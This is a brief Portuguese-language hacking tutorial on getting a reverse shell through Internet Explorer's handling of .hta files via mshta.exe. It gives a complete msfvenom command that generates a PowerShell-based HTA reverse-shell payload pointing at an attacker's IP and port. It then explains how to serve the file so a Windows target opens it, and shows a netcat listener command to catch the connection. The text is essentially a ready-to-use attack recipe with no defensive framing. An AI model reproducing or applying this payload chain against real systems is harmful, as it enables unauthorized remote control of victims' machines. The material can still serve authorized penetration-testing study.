Internet Explorer

Se um arquivo for criado com a extensão .hta em vez de .html, o Internet Explorer o interpretará automaticamente como um aplicativo HTML e oferecerá a capacidade de executá-lo usando o programa mshta.exe.

Com isso em mente, podemos explorar o mshta.exe utilizando o msfvenom.

sudo msfvenom -p windows/shell_reverse_tcp LHOST=<ip_atacante> LPORT=<porta> -f hta-psh -o <file.hta>

Agora que temos um arquivo criado, vamos jogá-lo em um servidor web e fazer com que a máquina alvo Windows acesse-a utilizando o Internet Explorer. Ao acessar e executar nosso arquivo .hta, iremos receber nossa reverse shell. Claro, não se esqueca de abrir um listener para receber a reverse shell. Pode utilizar o próprio netcat para isso.

nc -nlvp <port>